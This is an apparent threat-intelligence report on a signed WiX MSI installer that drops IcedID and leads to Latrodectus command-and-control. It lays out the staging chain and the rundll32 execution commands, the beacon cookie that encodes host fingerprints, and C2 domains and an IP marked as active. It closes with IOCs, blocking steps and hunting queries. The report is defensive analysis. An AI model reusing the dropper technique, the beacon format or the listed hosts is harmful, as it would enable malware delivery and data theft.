mediumRansomware

IcedID / Latrodectus — Signed WiX MSI Dropper Campaign

InvestigatedMarch 14, 2026PublishedMarch 14, 2026

ransomwarephishingcredential-theftc2dga

Analyst: GHOST — Breakglass Intelligence Report Date: 2026-03-14 Ticket: IR-99661418 Sample: info_IR-99661418.msi Classification: MALICIOUS — IcedID Stage-1 Dropper → Latrodectus Stage-2 C2

Executive Summary

info_IR-99661418.msi is a signed Windows Installer package that acts as a Stage-1 dropper for IcedID (BankBot/Bokbot), deploying a second-stage payload that communicates with an active Latrodectus C2 infrastructure cluster. The MSI abuses the WiX Toolset custom action framework to execute a .NET assembly (embedded within the package) that extracts and runs the IcedID core DLL via rundll32.exe. The sample carries a fraudulent code signing certificate issued to UK company "BELLAP LIMITED", a classic IcedID OPSEC technique to bypass application allowlisting and AV signatures.

The identified C2 IP (45.61.136.30, BL Networks / AS399629, Los Angeles) is hosting an active Latrodectus campaign with daily-rotating .top TLD domains registered through NICENIC International (Hong Kong). VT passive DNS shows 40+ domains resolving to this IP between December 2025 and March 2026, with new domains added within the last 24 hours, confirming an ongoing, live campaign.

Why this matters: IcedID is a precursor to ransomware. Historical IcedID campaigns led to Conti, REvil, and Quantum ransomware deployments. The IcedID → Latrodectus transition represents the current evolution of this threat actor's toolkit. Any organization with a hit on the C2 indicators should treat it as a potential ransomware precursor event.

Sample Metadata

Field	Value
Filename	info_IR-99661418.msi
SHA256	`17014299f399f71d1d6bed136b8c624a366b222166e692522d14e2bba70bb79f`
MD5	`8370a1edeea0634d8d5114d8dfb7762e`
SHA1	`584bb91abcf1999295ecd310d1166c46068692ee`
File Type	MSI (Composite Document File V2, OLE2)
File Size	1,130,496 bytes (1.08 MB)
VT Detections	35/72 (as of 2026-03-14)
VT Label	`trojan.icedid/msilheracles`
First Seen	2026-03-13 22:17:50 UTC
Reporter	Lenard
Tags	IcedID, KongTuke, Latrodectus, MSI, signed, WiX
Compilation Date	2023-03-07 15:32:44 UTC (WiX build date)
Code Signing	BELLAP LIMITED (C=GB, Sandhurst) via SSL.com
Cert Valid	2023-01-30 — 2023-12-18 (expired)
Builder	Windows Installer XML Toolset (WiX) 3.11.2.4516

Static Analysis

MSI Package Structure

The MSI is a WiX-built installer with the following properties:

Product Name: "Updater Wizard" (decoy branding)
Author: "User" (placeholder, non-legitimate)
Product GUID: {288D09A6-D7DF-489B-BCFD-E70EF055BE52}
Template: x64;1033 (64-bit, English)
WiX Version: 3.11.2.4516

The MSI contains no legitimate installed files (File table is empty). All payloads are stored in the Binary table as data streams:

Stream Name	Size	Description
`XNPNKL_File`	423,787 bytes	WiX SFX Custom Action DLL (launcher)
`calc`	662,016 bytes	IcedID core DLL (disguised as ImageMagick/FreeType)

MSI Custom Action:

Action:  XNPNKL
Type:    65 (DLL from Binary table, deferred execution)
Source:  XNPNKL_File
Target:  XNPNKL
Sequence: 6601 (runs after InstallFinalize)

Layer 1: WiX SFX Custom Action DLL (`XNPNKL_File`, 423KB)

Field	Value
SHA256	`56d660af5c140394385ad76f13da6fd86bf4a59e3a29355ce896fab203b1b0ba`
Type	PE32+ DLL, x86-64
Build Date	2019-09-17 (WiX CA stub, legitimate timestamp)
Format	InstallShield-style SFX (WiX managed CA host)
Imports	msi.dll, Cabinet.dll, SHLWAPI.dll, OLEAUT32.dll, KERNEL32.dll

This DLL is the standard WiX managed custom action host (zzzzInvokeManagedCustomActionOutOfProc). It contains an embedded CAB archive at byte offset 203,264 (size: 220,523 bytes) with the following contents:

File	Size	SHA256	Purpose
`test.cs.dll`	14,003 bytes	`aecaa270eeddd64ca9cf8e78b8c025e96575be8f9bfb43f620b40d156ae55cee`	.NET dropper CA
`WixSharp.dll`	435,712 bytes	`7eea616ea886145913c13d239f3e0ead58ace3a226e5aa330e67bbdd16673510`	WiX framework (legit)
`Microsoft.Deployment.WindowsInstaller.dll`	184,240 bytes	`cf06d4ed4a8baf88c82d6c9ae0efc81c469de6da8788ab35f373b350a4b4cdca`	WiX MSI lib (legit)
`CustomAction.config`	980 bytes	`1a67f60962ca1cbf19873b62a8518efe8c701a09cd609af4c50ecc7f0b468bb8`	WiX CA config

Execution mechanism:

rundll32.exe "C:\Windows\Installer\MSIC2DD.tmp",zzzzInvokeManagedCustomActionOutOfProc
    SfxCA_<id> 2 test.cs!NSABX.GGMLP.XNPNKL

Layer 2: .NET Dropper (`test.cs.dll`, 14KB)

Field	Value
SHA256	`aecaa270eeddd64ca9cf8e78b8c025e96575be8f9bfb43f620b40d156ae55cee`
Type	PE32 .NET Assembly (Mono/.NET, x86)
Framework	.NET v4.0.30319
Namespace	`NSABX.GGMLP`
Entry Class	`Script`
CA Method	`XNPNKL`

Key strings extracted from the .NET assembly:

RUNDLL    - invocation method
CALC      - name of Binary table stream to extract (IcedID DLL)
XNPNKL   - custom action entry point
SW_HIDE   - executes payload hidden (no console window)
GetProcAddressS / GetProcAddressN - custom API resolution (evasion)
LoadLibrary / FreeLibrary          - DLL loading pattern

Decompiled behavior (from IL analysis + sandbox):

Opens the MSI database using Microsoft.Deployment.WindowsInstaller
Reads the calc binary stream from the MSI Binary table
Writes the 662KB IcedID DLL to: C:\Users\<user>\AppData\Local\MSI<random_hex>.msi
Calls rundll32.exe "<path_to_dropped_file>",init hidden via SW_HIDE

Layer 3: IcedID Core DLL (`calc`, 662KB)

Field	Value
SHA256	`7b685ee2e18f37b07a399452823906151a01dc8ddc1919622533933da62c7749`
MD5	`dfaaf702617758487532bc9cd2a7d356`
Type	PE32+ DLL, x86-64
Build Timestamp	Wed Nov 10 09:50:55 2021 (likely forged)
Imports	KERNEL32.dll only (minimal import table for AV evasion)
Sections	.text, .rdata, .data, .pdata, .rsrc, .reloc
Known Dropped Names	MSIf073ff4b.msi, MSId358d862.msi, MSIa488da44.msi, MSI8438422d.msi

Exports (disguised as FreeType/ImageMagick library):

Ordinal	Name	Purpose
28	`cT_Bitmap_Init`	Fake FreeType export (decoy)
108	`cT_Init_FreeType`	Fake FreeType export (decoy)
205	`init`	IcedID C2 initialization routine

The DLL impersonates the FreeType font rendering library to blend in if analyzed superficially. Only KERNEL32.dll is imported — all other API calls are resolved at runtime via manual PE walking (GetProcAddress equivalent), making static analysis harder.

Infection Chain / Kill Chain

[User Execution]
       │
       ▼
info_IR-99661418.msi
(Signed: BELLAP LIMITED)
       │
       ▼ MSI CustomAction XNPNKL (sequence 6601, deferred)
       │
       ▼
C:\Windows\Installer\MSIC2DD.tmp (WiX SFX CA DLL, 423KB)
       │
       ▼ rundll32.exe "MSIC2DD.tmp",zzzzInvokeManagedCustomActionOutOfProc
       │   SfxCA_<id> 2 test.cs!NSABX.GGMLP.XNPNKL
       │
       ├──→ Extracts to C:\Windows\Installer\MSIC2DD.tmp-\:
       │       test.cs.dll (14KB .NET dropper)
       │       WixSharp.dll
       │       Microsoft.Deployment.WindowsInstaller.dll
       │       CustomAction.config
       │
       ▼ .NET NSABX.GGMLP.XNPNKL() executes
       │
       ▼ Reads "calc" binary stream from MSI (662KB IcedID DLL)
       │
       ▼ Writes to:
       │   C:\Users\<user>\AppData\Local\MSIf073ff4b.msi
       │   (random name: MSI<8_hex_chars>.msi)
       │
       ▼ rundll32.exe "MSIf073ff4b.msi",init (SW_HIDE)
       │
       ▼ IcedID C2 Beacon:
       │   HTTP GET http://statifaronta.com/
       │   Cookie: [encoded system fingerprint — see below]
       │
       ▼ Downloads Latrodectus Stage-2 payload
       │
       ▼ Persistent Latrodectus C2 beaconing to:
           *.top domains rotating daily on 45.61.136.30

IcedID C2 Beacon Analysis

IcedID uses a distinctive HTTP GET cookie-based check-in that encodes system information in Google Analytics-style cookie fields.

GET / HTTP/1.1
Host: statifaronta.com
Cookie: __gads=<install_id>:<arch>:<campaign_id>:<unknown>;
        _gat=<windows_version>.<bits>;
        _ga=<id>.<timestamp>.<random>.<random>;
        _u=<hex(computer_name)>:<hex(username)>:<hex(bot_id)>;
        __io=<21>_<num1>_<num2>_<num3>;
        _gid=<hex(MAC_address_12chars)>

Decoded Beacon from Sandbox Analysis

Beacon 1 (Windows 10 VM):

Cookie Field	Raw Value	Decoded
`__gads`	`2564808981:1:18886:99`	install_id:arch:campaign_id:version
`_gat`	`10.0.10586.64`	Windows 10 Build 10586, x64
`_ga`	`5.329300.1356.2`	beacon sequence info
`_u` part1	`584336345A42`	`XC64ZB` (computer name)
`_u` part2	`5244684A30434E4665767A58`	`RDhJ0CNFevzX` (username)
`_u` part3	`34334138303642434634374533463636`	`43A806BCF47E3F66` (bot ID)
`__io`	`21_1560258661_3990802383_1811730007`	campaign tracking
`_gid`	`000C4BE6000B`	MAC: `00:0C:4B:E6:00:0B`

Beacon 2 (Windows 7 VM):

Cookie Field	Raw Value	Decoded
`_gat`	`6.1.7601.64`	Windows 7 SP1, x64
`_u` part1	`415A5552452D5043`	`AZURE-PC` (computer name)
`_u` part2	`617A757265`	`azure` (username)
`_gid`	`121060CC2028`	MAC: `12:10:60:CC:20:28`

C2 Response: HTTP 404/403 (intentional — IcedID C2 servers disguise as broken websites)

Behavioral Analysis

Based on static analysis and VirusTotal sandbox telemetry:

Process Activity

msiexec.exe → rundll32.exe MSIC2DD.tmp,zzzzInvokeManagedCustomActionOutOfProc
                           → rundll32.exe MSIf073ff4b.msi,init

File System Artifacts

Path	Description
`C:\Windows\Installer\MSI<hex>.tmp`	WiX SFX CA staging DLL
`C:\Windows\Installer\MSI<hex>.tmp-\`	Extracted WiX CA files (temp)
`C:\Windows\Installer\MSI<hex>.tmp-\test.cs.dll`	.NET dropper
`C:\Windows\Installer\SourceHash{288D09A6-...}`	MSI source cache
`C:\Users\<user>\AppData\Local\MSI<random>.msi`	Dropped IcedID core DLL
`C:\Users\<user>\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log`	.NET CLR usage artifact
`C:\Config.Msi\`	MSI rollback data

Named Pipe

\Device\NamedPipe\SfxCA_<numeric>   (WiX CA IPC channel)

Network Activity

TLS validation: ocsps.ssl.com, crls.ssl.com, sslcom.repository.certum.pl (verifying code signing cert)
C2 beacon: HTTP GET http://statifaronta.com/ with encoded cookie
Latrodectus C2: HTTPS to rotating .top domains on 45.61.136.30

Code Signing Certificate Intelligence

The MSI is signed with a fraudulent / stolen code signing certificate:

Field	Value
Subject	`C=GB, ST=England, L=Sandhurst, O=BELLAP LIMITED, CN=BELLAP LIMITED`
Issuer	`SSL.com Code Signing Intermediate CA RSA R1`
Serial	`69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1`
Valid From	2023-01-30 09:22:21 UTC
Valid To	2023-12-18 09:22:21 UTC
Key Size	4096-bit RSA

BELLAP LIMITED is a registered UK company. The certificate was obtained from SSL.com approximately 5 weeks before this malware was compiled. This is consistent with the documented IcedID tactic of purchasing code signing certificates from CAs that offer extended validation for UK shelf companies, bypassing SmartScreen and application control policies.

The certificate is now expired. SSL.com was informed via abuse reporting channels at time of original campaign (2023).

Network Indicators

C2 Infrastructure

Primary C2 — IcedID

Field	Value
Domain	`statifaronta.com`
IP	`45.61.136.30`
Protocol	HTTP port 80
Status	Expired/Sinkholed (NXDOMAIN as of 2026-03-14)
Domain Created	2022-12-13
Domain Expired	2024-12-13
Registrar	Tucows (Registrar ID 69)
Name Servers	NS1.RENEWYOURNAME.NET, NS2.RENEWYOURNAME.NET
Registrant Country	Saint Kitts and Nevis
Subdomains (crt.sh)	cpanel, mail, autodiscover, m, www
TLS Certs	Let's Encrypt (legit-looking website setup)

C2 Server — Shared Infrastructure

Field	Value
IP	`45.61.136.30`
ASN	AS399629 (BL Networks)
Parent ASN	FranTech Solutions (PONYNET-15)
Network	45.61.136.0/22
Location	Los Angeles, United States
Open Ports	22/tcp (OpenSSH 8.9p1 Ubuntu 3ubuntu0.14)
VT Reputation	-11 (malicious)
Hosting	Bulletproof / privacy hosting

FranTech Solutions (BuyVM/LuxVPS) is a well-documented bulletproof hosting provider used extensively by ransomware and banking trojan operators.

Active Latrodectus C2 Domains (same IP, 2025-12-15 — 2026-03-14)

All domains registered via NICENIC INTERNATIONAL GROUP CO., LIMITED (HK, IANA ID 3765), DNS via Hurricane Electric (he.net) or Cloudflare:

Domain	First Seen on IP	Status
`ij5j3588auvgokw.top`	2026-03-14	ACTIVE (Cloudflare NS)
`fyyfbzhvw22.top`	2026-03-13	ACTIVE
`8qw84bm02cale2g.top`	2026-03-13	ACTIVE
`q59cdvf7px87wnj.top`	2026-03-13	ACTIVE
`zrd6omm630kx5p7.top`	2026-03-12	MALICIOUS (11 VT detections)
`8chzyct4h2xoesu.top`	2026-03-11	ACTIVE
`z5tfukf1oayv5zs.top`	2026-03-10	ACTIVE
`hyls9303v59enui.top`	2026-03-10	ACTIVE
`hc02f2tzgfncn43.top`	2026-03-09	ACTIVE
`qjpmju82a7l4wx5.top`	2026-03-09	ACTIVE
`fifuvhzw2.top`	2026-03-08	ACTIVE
`yj8o0j8w9kct59e.top`	2026-03-06	ACTIVE
`h7lof0kdoasxsvr.top`	2026-03-06	ACTIVE
`nna62fgze.top`	2026-03-05	ACTIVE
`nsugzw35.top`	2026-03-04	ACTIVE
`rajhuvuz.top`	2026-03-03	ACTIVE
`75cia9fvnmojdc1.top`	2026-03-03	ACTIVE
`gqgbl0mu1p0amep.top`	2026-03-02	ACTIVE
`fggrtewz.top`	2026-03-02	SUSPICIOUS (4 VT detections)
`yxoy6h0suupq4jz.top`	2026-03-02	ACTIVE
`g5wlryfpmze7moa.top`	2026-03-01	ACTIVE
`7jsrg87r8w2hdln.top`	2026-03-01	ACTIVE
`kcichmmdhjgifme.top`	2026-02-28	ACTIVE
`42bljl1xv3qugts.top`	2025-12-30	ACTIVE
`atmn4a1ylmh2329.top`	2025-12-29	ACTIVE
`gjxqoy2ya58bpar.top`	2025-12-28	ACTIVE
`s1kvtb4yp7rryqq.top`	2025-12-27	ACTIVE
`ma8t9n3yzo0jbi9.top`	2025-12-27	ACTIVE
`yrvye05yeri0ky8.top`	2025-12-23	ACTIVE
`5i60zo5y3a9877p.top`	2025-12-22	ACTIVE
`b8h3jd6ytt1htf7.top`	2025-12-21	ACTIVE
`hzs6417zicspfnp.top`	2025-12-20	ACTIVE
`np38oq8z7vjy2v6.top`	2025-12-19	ACTIVE
`tgeb9e8zwea6o3o.top`	2025-12-18	ACTIVE
`5x0gerazbgtnxkn.top`	2025-12-17	ACTIVE
`z6pdt39zmx2ebc5.top`	2025-12-17	ACTIVE
`iemlj4bzqib460m.top`	2025-12-16	ACTIVE
`o4xo4tc0f13cs84.top`	2025-12-16	ACTIVE
`bnbjzgbz0zkvjs5.top`	2025-12-15	ACTIVE
`altcoinsfun.net`	2025-07-17	ACTIVE

Pattern analysis: Latrodectus uses 1-2 new .top domains per day, all on 45.61.136.30. Domain names follow a pseudo-random alphanumeric pattern (8-16 chars + .top). This is consistent with documented Latrodectus DGA behavior observed by Elastic Security Labs and Team Cymru (2024-2026).

MITRE ATT&CK TTPs

Technique	ID	Description
Phishing: Malicious Link/File	T1566.001/T1566.002	MSI delivered via phishing email or web redirect
User Execution: Malicious File	T1204.002	Victim executes the MSI installer
System Binary Proxy Execution: Msiexec	T1218.007	MSI package executed via msiexec.exe
System Binary Proxy Execution: Rundll32	T1218.011	`rundll32.exe MSIfile.msi,init`
Subvert Trust Controls: Code Signing	T1553.002	BELLAP LIMITED stolen/fraudulent cert
Obfuscated Files: Embedded Payloads	T1027.009	Payload in MSI Binary table stream
Obfuscated Files: Software Packing	T1027.002	WiX SFX CA wraps .NET assembly
Masquerading: Rename System Utilities	T1036.003	IcedID DLL dropped as `.msi` extension
Masquerading: Match Legitimate Name	T1036.005	FreeType/ImageMagick export names on IcedID DLL
Application Layer Protocol: Web Protocols	T1071.001	HTTP C2 beaconing to statifaronta.com
Ingress Tool Transfer	T1105	Downloads Latrodectus from `.top` C2
System Information Discovery	T1082	OS version, build, architecture harvested
System Network Configuration Discovery	T1016	MAC address extracted for bot fingerprinting
System Owner/User Discovery	T1033	Username, computername extracted for beacon
Boot or Logon Autostart (likely)	T1547.001	IcedID persistence via Run key (suspected)
Process Injection (likely)	T1055	IcedID injects into legitimate process
Indicator Removal: File Deletion	T1070.004	WiX temp files cleaned up post-execution
Data from Local System	T1005	Credentials, cookies harvested by IcedID

IOCs — Complete Indicator Table

File Hashes

SHA256	MD5	Description
`17014299f399f71d1d6bed136b8c624a366b222166e692522d14e2bba70bb79f`	`8370a1edeea0634d8d5114d8dfb7762e`	Main MSI dropper
`7b685ee2e18f37b07a399452823906151a01dc8ddc1919622533933da62c7749`	`dfaaf702617758487532bc9cd2a7d356`	IcedID core DLL (stage-2)
`aecaa270eeddd64ca9cf8e78b8c025e96575be8f9bfb43f620b40d156ae55cee`	—	.NET dropper CA (test.cs.dll)
`56d660af5c140394385ad76f13da6fd86bf4a59e3a29355ce896fab203b1b0ba`	`cc16f0abf158f58398a156fad6ce997a`	WiX SFX CA DLL
`7eea616ea886145913c13d239f3e0ead58ace3a226e5aa330e67bbdd16673510`	—	WixSharp.dll (embedded, legitimate)

Network — Domains (C2)

Domain	Type	Status
`statifaronta.com`	IcedID C2	Expired/NXDOMAIN
`ij5j3588auvgokw.top`	Latrodectus C2	ACTIVE 2026-03-14
`fyyfbzhvw22.top`	Latrodectus C2	ACTIVE
`8qw84bm02cale2g.top`	Latrodectus C2	ACTIVE
`q59cdvf7px87wnj.top`	Latrodectus C2	ACTIVE
`zrd6omm630kx5p7.top`	Latrodectus C2	CONFIRMED MALICIOUS
`8chzyct4h2xoesu.top`	Latrodectus C2	ACTIVE
`z5tfukf1oayv5zs.top`	Latrodectus C2	ACTIVE
`hyls9303v59enui.top`	Latrodectus C2	ACTIVE
`hc02f2tzgfncn43.top`	Latrodectus C2	ACTIVE
`qjpmju82a7l4wx5.top`	Latrodectus C2	ACTIVE
`fggrtewz.top`	Latrodectus C2	SUSPICIOUS
`rajhuvuz.top`	Latrodectus C2	ACTIVE
`altcoinsfun.net`	Related Infrastructure	ACTIVE

Network — IPs

IP	ASN	Hosting	Role	Status
`45.61.136.30`	AS399629 (BL Networks)	FranTech / BuyVM	IcedID + Latrodectus C2	ACTIVE

URLs (C2 Endpoints)

http://statifaronta.com/          (IcedID check-in, expired)
http://statifaronta.com           (IcedID check-in, expired)
https://<rotating>.top/<path>     (Latrodectus C2, ACTIVE)

File System Artifacts

C:\Users\*\AppData\Local\MSI*.msi              (IcedID core DLL, random name)
C:\Windows\Installer\MSI*.tmp                  (WiX SFX CA staging DLL)
C:\Windows\Installer\MSI*.tmp-\test.cs.dll     (.NET dropper artifact)
C:\Users\*\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log  (.NET CLR artifact)
\Device\NamedPipe\SfxCA_*                      (WiX CA named pipe)

Registry

HKCU\SOFTWARE\Microsoft\...\Run\  (IcedID persistence — suspected)

Code Signing Certificate

Subject:  C=GB, ST=England, L=Sandhurst, O=BELLAP LIMITED
Serial:   69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1
Thumbprint: [see cert stream SHA256 in Binary table]
Issuer:   SSL.com Code Signing Intermediate CA RSA R1

Known MSI Filenames (Same Payload)

VT observed this IcedID DLL dropped under multiple names:

MSIf073ff4b.msi
MSId358d862.msi
MSIa488da44.msi
MSI8438422d.msi
4ffada.msi, 3dba6d.msi

MSI Distribution Names

info_IR-99661418.msi (this sample)
4ffada.msi
3dba6d.msi

Campaign Timeline

Date	Event
2022-12-13	statifaronta.com registered
2023-01-30	BELLAP LIMITED code signing cert issued
2023-03-07	MSI compiled (WiX build date)
2023-03-09/10	Sample first appeared in sandbox (VT first_seen: 1678424830)
2024-12-13	statifaronta.com expired
2025-07-17	altcoinsfun.net observed on same IP
2025-12-15	Latrodectus .top domain rotation begins on 45.61.136.30
2026-03-13/14	Sample resubmitted; active Latrodectus C2 infrastructure confirmed

KongTuke Connection

The sample is tagged with KongTuke — a JavaScript-based traffic distribution system (TDS) used to deliver IcedID via compromised websites and malvertising. The infection chain likely begins: Compromised website → KongTuke TDS → Redirects to IcedID MSI download. This is consistent with KongTuke → IcedID campaigns documented by Proofpoint (TA577) in 2023.

Attribution

Threat Actor Profile

Field	Assessment
Family	IcedID (BankBot/Bokbot) → Latrodectus
Operator Model	Malware-as-a-Service (MaaS) — IcedID is rented
Likely Actor	TA577 / TA551 (Shathak) — consistent TTPs
Delivery	KongTuke TDS → MSI dropper
Infrastructure	FranTech/BuyVM bulletproof hosting
End Goal	Credential theft / Ransomware precursor
Confidence	Medium-High

OPSEC Mistakes / Attribution Pivots

Same C2 IP for IcedID and Latrodectus — links both malware families to a single operator
Latrodectus domain pattern — NICENIC registrar + HE nameservers = traceable registration pattern
BELLAP LIMITED cert — traceable UK company registration, SSL.com audit trail
Registrant country leak — Saint Kitts and Nevis visible despite Tucows privacy protection
Domain kept on same IP for 15+ months — long-term bulletproof hosting relationship with FranTech/BL Networks

IcedID → Latrodectus Relationship

Latrodectus (also known as "Unidentified 111" or "BlackWidow") was first documented by Elastic Security Labs in 2024 as a successor/evolution of IcedID. The shared infrastructure (same C2 IP) between IcedID (2023 sample) and active Latrodectus C2 (Dec 2025 - Mar 2026) strongly suggests the same operator group is maintaining long-term infrastructure and has migrated from IcedID to Latrodectus for the primary C2 payload while continuing to use IcedID MSI droppers for initial access.

Infrastructure Map

                    ┌─────────────────────┐
                    │   45.61.136.30      │
                    │   BL Networks       │
                    │   AS399629          │
                    │   (FranTech/BuyVM)  │
                    │   Los Angeles, US   │
                    └────────┬────────────┘
                             │
              ┌──────────────┼──────────────────────┐
              │              │                      │
              ▼              ▼                      ▼
    statifaronta.com    *.top domains          altcoinsfun.net
    (IcedID C2)        (Latrodectus C2)        (Related infra)
    EXPIRED 2024-12    ~1-2 new/day            Jul 2025
    Registrar: Tucows  Registrar: NICENIC
    Country: KN        HE.net / CF DNS

    Certificate Issuer Chain:
    SSL.com Root → Code Signing Intermediate → BELLAP LIMITED
    (C=GB, Sandhurst, England)
    Valid: 2023-01-30 to 2023-12-18

OPSEC Artifact: Threat Actor Build Path

The .NET dropper assembly (test.cs.dll) contains a hardcoded build path exposing the threat actor's development environment:

c:\!msi\Test\test.cs

Found at offset 0x2e19 in the .NET PDB/debug metadata embedded in the assembly. Observations:

The project was named !msi (leading ! keeps it top of directory listings)
Source file named test.cs — placeholder name suggesting rapid development / throwaway code
Development under C:\ directly (not user profile) — suggests dedicated build VM
The same test.cs source name appears throughout the WiX build pipeline (test.cs.dll, test.cs!NSABX.GGMLP.XNPNKL)

Unique IcedID Build Marker

The IcedID core DLL (662KB) contains a unique embedded string marker in the .rdata section at offset 0x93dac:

edVjFycwbZAShCxgKm\0SmDzhEwPCZOEZswqggMaHjjInItVdchpAdXrT\0rFKGQkGCiywvilTuYZzhtL

This appears to be a build-specific identifier or internal marker embedded by the IcedID builder — a sequence of pseudo-random strings characteristic of a specific IcedID build version. The string SmDzhEwPCZOEZswqggMaHjjInItVdchpAdXrT (38 chars) is highly specific and can be used as a unique YARA hunt string to identify this exact IcedID build across other samples and memory dumps.

Detection Recommendations

Immediate Actions

Block 45.61.136.30 at perimeter firewall
Block all listed .top domains at DNS
Alert on any rundll32.exe spawning with a .msi file argument
Alert on zzzzInvokeManagedCustomActionOutOfProc in process command lines
Search endpoint telemetry for MSI*.msi files in %APPDATA%\Local\
Revoke trust for BELLAP LIMITED certificate serial 698ff388adb50b88afb832e76b0a0ad1

Hunting Queries (Sysmon/EDR)

# Detect rundll32 loading .msi file with "init" export
EventID=1 Image=*rundll32.exe CommandLine=*.msi*init*

# Detect WiX managed CA execution pattern
EventID=1 CommandLine=*zzzzInvokeManagedCustomActionOutOfProc*

# Detect IcedID DLL dropped to AppData/Local as .msi
EventID=11 TargetFilename=*AppData\Local\MSI*.msi

# Detect .NET CLR activation by rundll32
EventID=11 TargetFilename=*CLR_v4.0\UsageLogs\rundll32.exe.log*

Report generated by GHOST — Breakglass Intelligence "One indicator. Total infrastructure."

Executive Summary

Sample Metadata

Static Analysis

MSI Package Structure

Layer 1: WiX SFX Custom Action DLL (XNPNKL_File, 423KB)

Layer 2: .NET Dropper (test.cs.dll, 14KB)

Layer 3: IcedID Core DLL (calc, 662KB)

Infection Chain / Kill Chain

IcedID C2 Beacon Analysis

Cookie Format

Decoded Beacon from Sandbox Analysis

Behavioral Analysis

Process Activity

File System Artifacts

Named Pipe

Network Activity

Code Signing Certificate Intelligence

Network Indicators

C2 Infrastructure

Primary C2 — IcedID

C2 Server — Shared Infrastructure

Active Latrodectus C2 Domains (same IP, 2025-12-15 — 2026-03-14)

MITRE ATT&CK TTPs

IOCs — Complete Indicator Table

File Hashes

Network — Domains (C2)

Network — IPs

URLs (C2 Endpoints)

File System Artifacts

Registry

Code Signing Certificate

Campaign Context & Related Samples

Known MSI Filenames (Same Payload)

MSI Distribution Names

Campaign Timeline

KongTuke Connection

Attribution

Threat Actor Profile

OPSEC Mistakes / Attribution Pivots

IcedID → Latrodectus Relationship

Infrastructure Map

OPSEC Artifact: Threat Actor Build Path

Unique IcedID Build Marker

Detection Recommendations

Immediate Actions

Hunting Queries (Sysmon/EDR)

Layer 1: WiX SFX Custom Action DLL (`XNPNKL_File`, 423KB)

Layer 2: .NET Dropper (`test.cs.dll`, 14KB)

Layer 3: IcedID Core DLL (`calc`, 662KB)